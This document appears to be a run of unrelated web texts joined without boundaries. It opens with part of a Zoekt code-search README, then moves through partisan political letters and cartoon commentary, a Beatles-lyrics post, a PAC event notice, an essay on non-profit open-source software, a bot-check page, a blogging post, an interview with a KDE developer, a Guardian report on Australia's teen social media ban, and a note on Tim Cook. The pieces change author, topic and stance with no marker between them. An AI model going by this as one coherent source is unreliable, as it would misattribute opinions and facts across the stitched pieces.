$GOPATH/bin/zoekt-indexserver -mirror_config config.json -data_dir ~/.zoekt/
This will fetch all repos under 'github.com/apache', then index the repositories. The indexserver takes care of periodically fetching and indexing new data, and cleaning up logfiles. See config.go for more details on this configuration.
go install github.com/sourcegraph/zoekt/cmd/zoekt-webserver
$GOPATH/bin/zoekt-webserver -index ~/.zoekt/
This will start a web server with a simple search UI at http://localhost:6070 . See the query syntax docs for more details on the query language.
If you start the web server with
-rpc
, it exposes a
simple JSON search
API
at
http://localhost:6070/api/search
.
The JSON API supports advanced features including:
FlushWallTime
option)
UseBM25Scoring
option)
NumContextLines
option)
Finally, the web server exposes a gRPC API that supports structured query objects and advanced search options.
Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for coming up with this idea, and helping Han-Wen Nienhuys flesh it out.
Resources:
Announcements:
.
No War on Venezuela, Money for People's Needs, Not the War Machine -- Poster
Dr. James MacLeod
December 4, 2025
MacLeodCartoons
Re: Opinion: Everyone Is Talking About Affordability — and Making the Same Mistake
Discussion of outlawing stock buybacks that were once illegal would be a crucial way to address the wage issue.
Given the corruption of our lawmakers this has a very long shot of being realized but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.
Jessica Benjamin
Students attending school in the winter, mostly in the Midwest or the East Coast, get a Snow Day if a heavy snowstorm blankets their town then school will be canceled and kids can play all day. In Los Angeles, students have been not going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.
Lalo's cartoon archive can be seen here.
Lalo Alcaraz
December 3, 2025
CALÓ NEWS
Re: Amber Czech Was Murdered at Work. Tradeswomen Say It Could Have Happened to Any of Them.
This is horrible; I was a shop steward for 35 years in the carpenters union local 157 NYC.
We take a harassment class and get certified among a dozen other certifications.
None of this only happens on non union jobs.
No woman is harassed on any of my jobs let alone killed?
Harassment of women is on the rise and maybe it is because a rapist is in the White House?
You can’t just look the other way, if you do you are an enabler.
There are so many things the public see and turns a blind eye to!!!
Humans are tribal and we have good tribes and bad it is your choice.
You can’t stand and listen to the president call a woman reporter “Piggie’ and not call him out on the spot.
Stupid and arrogant not very good qualities in the most powerful job in the world.
My union is the only place where women get paid the same pay as the men.
Speak up not after the fact.
Manipulation is rampant.
John Campo
Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.
Nick Anderson
December 1, 2025
Pen Strokes
Re: Palestinians Offer a Much Clearer Path to Peace
"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."
Bill Rogers
Posted on
Portside's Facebook page
Re: Peace in Ukraine – Peace in Europe
The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.
John Gilbert
Posted on
Portside's Facebook page
Re: To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise
I would call it building a coalition around central shared goals. In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process. If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there. We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.
Sonia Cobbins
Posted on
Portside's Facebook page
Con Job President -- Cartoon and Commentary by Clay Jones
When Donald Trump became president in 2016, he was fortunate that he was inheriting President Barack Obama's economy. It was such a strong economy he inherited that it took him almost 4 years to fuck it up. Although throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump back into the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office in 2020 with the biggest. loss of jobs since Hoover.In 2020, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims Biden's inflation at the time he came into office was bad, that has gotten worse, too since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.
Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.
A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.
Even Trump must realize that since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.
But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.
Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.
He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”
Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.
Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.
Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.
I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.
Clay Jones
December 3, 2025
Claytoonz
Watching Rainbows -- Unreleased song by John Lennon
Mr. Fish
MR. FISH’S CATCH OF THE DAY
December 4, 2025
The Independent Ink
Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called Watching Rainbows and was recorded in 1969 during the Let it Be sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries, Get Back, nor was it included on any of the Anthology releases. Here are the lyrics, most likely invented by Lennon on the spot:
Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some
Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t
Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me
Please shoot me
Even before the Now and Then single was released in 2023 and announced as the “last Beatles song,” I thought Rainbows should be stitched together with McCartney’s Pillow for Your Head and Harrison’s Mother Divine , both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out Abby Road . The connecting tissue for Divine Rainbow Pillow could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard Now and Then and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song— anything other than Now and Then , but I’ll save those for a later post - ha!)
Here are the tracks. Dig it.
Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT
Virtual Event ⸱ Zoom link shared after registration
Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.
Speakers:
Notes:
MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.
We just put out our 2025 reca p — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.
MVP operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.
We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)
Movement Voter Project
37 Bridge Street, Box 749
Northampton, MA 01060
For all news and media inquiries, email press@movement.vote.
I feel a change is happening in how people produce and (want to) consume software, and I want to give my two cents on the matter.
It has become more mainstream to see people critical of "Big Tech". Enshittification has become a familiar term even outside the geek community. Obnoxious "AI" features that nobody asked for get crammed into products. Software that spies on its users is awfully common. Software updates have started crippling existing features, or have deliberately stopped being available, so more new devices can be sold. Finally, it is increasingly common to get obnoxious ads shoved in your face, even in software you have already paid for .
In short, it has become hard to really trust software. It often does not act in the user's best interest. At the same time, we are entrusting software with more and more of our lives.
Thankfully, new projects are springing up which are using a different governance model. Instead of a for-profit commercial business, there is a non-profit backing them. Some examples of more or less popular projects:
Some of these are older projects, but there seems to be something in the air that is causing more projects to move to non-profit governance, and for people to choose these.
As I was preparing this article, I saw an announcement that ghostty now has a non-profit organisation behind it. At the same time, I see more reports from developers leaving GitHub for Codeberg , and in the mainstream more and more people are switching to Signal.
From a user perspective, free software and open source software (FOSS) has advantages over proprietary software. For instance, you can study the code to see what it does. This alone can deter manufacturers from putting in user-hostile features. You can also remove or change what you dislike or add features you would like to see. If you are unable to code, you can usually find someone else to do it for you.
Unfortunately, this is not enough. Simply having the ability to see and change the code does not help when the program is a web service. Network effects will ensure that the "main instance" is the only viable place to use this; you have all your data there, and all your friends are there. And hosting the software yourself is hard for non-technical people. Even highly technical people often find it too much of a hassle.
Also, code can be very complex! Often, only the team behind it can realistically further develop it. This means you can run it yourself, but still are dependent on the manufacturer for the direction of the product. This is how you get, for example, AI features in GitLab and ads in Ubuntu Linux. One can technically remove or disable those features, but it is hard to keep such a modified version (a fork ) up with the manufacturer's more desirable changes.
The reason is that the companies creating these products are still motivated by profit and increasing shareholder value. As long as the product still provides (enough) value, users will put up with misfeatures. The (perceived) cost of switching is too high.
Let us say a non-profit is behind the software. It is available under a 100% FOSS license. Then there are still ways things can go south. I think this happens most commonly if the funding is not in order.
For example, Mozilla is often criticised for receiving funding from Google. In return, it uses Google as the default search. To make it less dependent on Google, Mozilla acquired Pocket and integrated it into the browser. It also added ads on the home screen. Both of these actions have also been criticized. I do not want to pick on Mozilla (I use Firefox every day). It has clearly been struggling to make ends meet in a way that is consistent with its goals and values.
I think the biggest risk factor is (ironically) if the non-profit does not have a sustainable business model and has to rely on funding from other groups. This can compromise the vision, like in Mozilla's case. For web software, the obvious business model is a SaaS platform that offers the software. This allows the non-profit to make money from the convenience of not having to administer it yourself.
Ah, good old volunteer driven FOSS. Personally, I prefer using such software in general. There is no profit motive in sight and the developers are just scratching their own itch. Nobody is focused on growth and attracting more customers. Instead, the software does only what it has to do with a minimum of fuss.
I love that aspect, but it is also a problem. Developers often do not care about ease of use for beginners. Software like this is often a power tool for power users, with lots of sharp edges. Perfect for developers, not so much for the general public.
More importantly, volunteer driven FOSS has other limits. Developer burn-out happens more than we would like to admit , and for-profit companies tend to strip-mine the commons .
There are some solutions available for volunteer-driven projects. For example Clojurists together , thanks.dev , the Apache Foundation , the Software Freedom Conservancy and NLNet all financially support volunteer-driven projects. But it is not easy to apply to these, and volunteer-driven projects are often simply not organized in a way to receive money.
With a non-profit organisation employing the maintainers of a project, there is more guarantee of continuity. It also can ensure that the "boring" but important work gets done. Good interface design, documentation, customer support. All that good stuff. If there are paying users, I expect that you get some of the benefits of corporate-driven software and less of the drawbacks.
That is why I believe these types of projects will be the go-to source for sustainable, trustworthy software for end-users. I think it is important to increase awareness about such projects. They offer alternatives to Big Tech software that are palatable to non-technical users.
To continue, please click the box below to let us know you're not a robot.
Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .
For inquiries related to this message please contact our support team and provide the reference ID below.
Block reference ID:c063c4c9-d1ab-11f0-8b29-ea5f109eb97b
Get the most important global markets news at your fingertips with a Bloomberg.com subscription.
SUBSCRIBE NOWPosted at December 04, 2025
Before social media became what it is today I used to blog a lot. And I wasn't the only one, many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a selfhosted blog, or a platform like wordpress or blogger).
The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is shrinking.
There seems to be some resurgence into the old web now, time will tell if it gains any real ground. It's an uphill battle: Besides most online eyeballs now being glued to social media apps, we're seeing AI take over the way people interact with the internet altogether. Back in the old days if you wanted to know more about something you'd google the term and start going through the websites Google said are most relevant. Now AI is a lot more efficient in getting you the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website the AI will fetch it behind the scenes and summarize it for you. From a UX perspective this is the obvious direction things will continue to go.
A second problem is that of quality: people who put a lot of time in their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content doesn't live on the open web anymore (but at least there are no ads here). This is probably a win for writers, as well as the quality of the overall content being produced (and read) globally, but it's a loss for the open web.
So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good articles?
Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and a travel/picture blog called mijnrealiteit . Whenever I get this feeling, I start with updating the blog software: Throughout the years both blogs have gone through different iterations: from custom CMS systems, to WordPress instances with custom themes, to ending up with simple statically generated websites. You can find some historical posts here .
So towards an AI coding tool I turn, which have the power to write/change hundreds of lines of code in seconds with a simple one sentence instruction. AI coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed/quality outpaces what a human developer can do. But there are also many cases where it writes junk (called slop) and does things that make no sense.
I actually wanted to do the very opposite of what "vibe coders" typically use AI tools for: instead of providing a simple (and vague) instruction to let the AI go crazy and build a new blog from scratch, I used it to strip/simplify my existing blog software towards the open web hygiene I value:
You can find the code for mijnrealiteit on github , I'll publish the code for this blog soon as well.
It's all live now, as well as super minimal "about me" site on mvr.com . So I can get back to blogging! Will anyone actually read anything I post? I won't know since I removed all trackers. So for now I am screaming into the void.
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!
Please introduce yourself!
I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.
How did you first discover computers as a kid?
I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware. While all my peers at school would have PS2s, I played on NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook, I always wanted to make my own. And I did !
What were your first games like?
My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is really bad , but that was sort of the point. The next game I made when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, and 3D platformer, and FPS called Penance that has about 19k downloads. You can find my games on Itch. Lately though, I haven't had the energy to finish my game projects e.g. Artificial Rage: https://codeberg.org/akselmo/Artificial-Rage
I sank a fair few hours into Penance! I also really liked the Christmas game you made your sister. Do you ever put Easter eggs in code or often make projects for others like that?
I put some Easter eggs. For example someone complained that in Penance all the weapons look like woolen socks(?). So I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it as a secret, which proved difficult! We have made a few games together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.
How do you ideate the game play, style and such things?
While playing, I usually think it "would be cool if I had this game but changed this and that.." which provides a great starting point. Then it just naturally evolves into it's own thing. Penance was pretty much me going "I want Quake but with random generated levels" but then I ended up making a campaign with handcrafted levels to it anyway, beside the random generated endless mode.
Really, I just make things I want to play. People liking it is just a bonus. One of my favorite game projects is Castle Rodok because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.
What languages and technologies did you use?
With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quick, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices so I can't talk about them due to NDAs.
Most of my games have been in Unity, but Crypt of Darne uses Python and I also have played around with C and Odin for my game projects.
I have tried LISPs and functional programming languages and such, but I just have hard time with them. Especially with those that propose a completely different syntax for me. I haven't had any projects with Rust but I liked tinkering with it it, besides the
'
lifetime syntax which I easily miss. I am very boring when it comes to programming languages, I like to stick with what I know. I wanderlust about what I can create: Games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, If I feel like working on a game, I go with the flow and do that.
What was your experience with different OS before finding KDE ?
I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick to it because I could not play any games I owned in Linux. When I learned that Linux systems can in-fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and it's compositing eating all the FPS, so I gave up for a while. 6 months later I tried Kubuntu which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with the compositing eating FPS in games. KDE was also very easy to learn and understand. I didn't really need to customize it. Then I found an annoying bug I wanted to fix it and started to contribute.
What was the first contribution experience like?
I had no idea how to do anything with C++. I learned C from scratch making Artificial Rage , studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. It wasn't very big though, I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on Gitlab helped wrap it up. One of my first larger contributions though was adding region and language settings to system settings. This allowed users to change, for example, date-time settings differently than currency. This was mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.
It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you. For example, the signal and slot system or objects having parent objects that clear their children when they're deconstructed. Qt's documentation is also pretty great.
I'm still learning and don't have much in depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense. It should autogenerate as part of the compilation. I found some such header generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.
What are your thoughts on Linux over all, big things which need changing but no one is working on or nice initiatives which you think will improve things, etc.?
The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEM's start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people moved over. Just few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.
Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance than a computer, immutable systems are very nice: They allow them to jump from broken state back to working state with ease (select different boot entry at startup).
Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: Make it easy to install, test, run, etc... If Linux desktops can get more hardware manufacturers on board to install Linux desktop as default, that will certainly help too. Also shoutout to the [EndOf10]( https://endof10.org/ initiative, when I shared it around to my non-nerdy-friends, they were very curious about Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels, we need to stop fighting "whats the best desktop" and work together more.
BTW, if anyone reading this has been Linux curious, go for it! Take a secondary device and play around with it there. And I also want to point out that dont be afraid to contribute to things you like in any way you can, be it software or hardware or actual physical world.
How do you see it in light of more phone usage, less desktop usage? Have you any impressions of governments or businesses moving to linux?
Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.
Phones are the king of "basic stuff" and for many people a tablet functions as a simple internet-appliance. I can only hope that projects like [PostmarketOS]( https://postmarketos.org/ will help to keep these tablets and phones working when the regular android updates stop, to ease the avalanche of e-waste.
When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I do not know, but I would like to drive more for it. It's certainly an area where we should try to help as much as possible as well.
How can we (individuals or organizations) help?
Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter, just say it's something you use and elaborate when people ask. Too many times I've seen people pushed away from using Linux desktop because people are very.. Pushy. As surprising it may be, not many people really care as much as we do!
Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small. It does not need to be an overnight change, just small things here and there.
How many resources do you have compared to the demands of everything you are working on?
We're definitely stretched. We always could use more help, though C++ seems to deter that help a bit, which I can understand. But if I could start from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.
What prerequisites are there for contributing?
We have Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute.) All of it is documented . When triaging, I am trying to more often tag bugs in bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy so we hope people put some effort into trying to learn things too, of course.
How could bug reporting be improved?
I think we could half-automate bug reports, to make things easier: Gather basic information and ask basic questions upfront, without needing to open a web browser. For crash reports, we use a tool called DrKonqi : When app crashes, it gathers backtraces etc. automagically and allows the user to type what happened in a field. Something similar for regular ol' bugs would be great. Games do this with taking screenshots and logs when player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: Go through some bug reports, see if you can reproduce them or not, and report back to it with your system information. Anyone can do it, it's not a difficult job, just a bit tedious, especially when there's thousands of bug reports and 10 people going through them.
How do you approach problem solving?
Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at same time:
git blame
is a good friend, asking people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s.
Anything that pokes your brain in multiple different directions.
I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?
Sometimes the code just "feels right" or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.
What inspires you to have an online presence (in irc, commenting, blog posts etc.)? How do you decide when to make a blog post or not?
For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.
I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee-breaks and office chitchat, so I hang about in IRC, Matrix, Fediverse, Lobsters etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.
Due to learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web-browser and do something else. The hardest part is actually noticing it.
Do you have any interesting personal tools? I use your colorscheme .
I journal a lot on a remarkable2 tablet when working, writing down what I have done, should do or notes figuring out problems. Writing by hand helps me remember things too. I made an RSS "newspaper" script for my tablet too, which also shows the daily weather now.
I also use todo.txt for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called KomoDo .
Then I use Obsidian for any technical notes and know-how, like programming and computer things that are pain to write by hand.
When did you migrate to codeberg ?
It was even before Github started getting "AI" stuff. I just got tired of Github being a social media site instead of a good platform. SourceHut would have been nice too, I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.
As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.
One teenaged TikTok influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”
From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.
Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.
Sign up: AU Breaking News email
Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.
The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.
“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.
“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”
Here’s what we know about some of the apps where children are migrating.
The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.
The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.
Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.
Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.
Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.
“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.
AI has been widely used in social media moderation for years, however Beckett says it has significant limitations.
“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”
Coverstar has been contacted for comment.
Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.
Users can connect a TikTok account, allowing them to seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.
However, on Tuesday Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.
With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.
after newsletter promotion
Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.
Similar to Lemon8, Australia’s eSafety commissioner said she had written to Yope advising them to self assess. Ismailau told the Guardian he had not received any correspondence, however was “ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms”.
He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.
“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”
Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.
A mobile phone number is required to create an account.
Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.
Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.
Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.
“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”
However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.
Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.
“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”
Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.
“They’re going to get around it,” Beckett said. “They’ll figure it out.”
NBC News, back in March 2018 :
Speaking at a town hall event hosted by MSNBC’s Chris Hayes and Recode’s Kara Swisher, Cook said Facebook put profits above all else when it allegedly allowed user data to be taken through connected apps. [...]
When asked what he would do if he were in Zuckerberg’s position, Cook replied: “What would I do? I wouldn’t be in this situation.”
“The truth is we could make a ton of money if we monetized our customer, if our customer was our product,” Cook said. “We’ve elected not to do that.”
“Privacy to us is a human right. It’s a civil liberty, and something that is unique to America. This is like freedom of speech and freedom of the press,” Cook said. “Privacy is right up there with that for us.”
Perhaps Cook now needs to define “us”.
This was a rather memorable interview. Cook’s “What would I do? I wouldn’t be in this situation” is one of the stone-coldest lines he’s ever zinged at a rival company. (In public, that is.) That was just ice cold. Cook is a consummate diplomat. Most non-founder big company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy — none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception, multiple times , when it comes to Facebook/Meta (and to a lesser degree, Google).
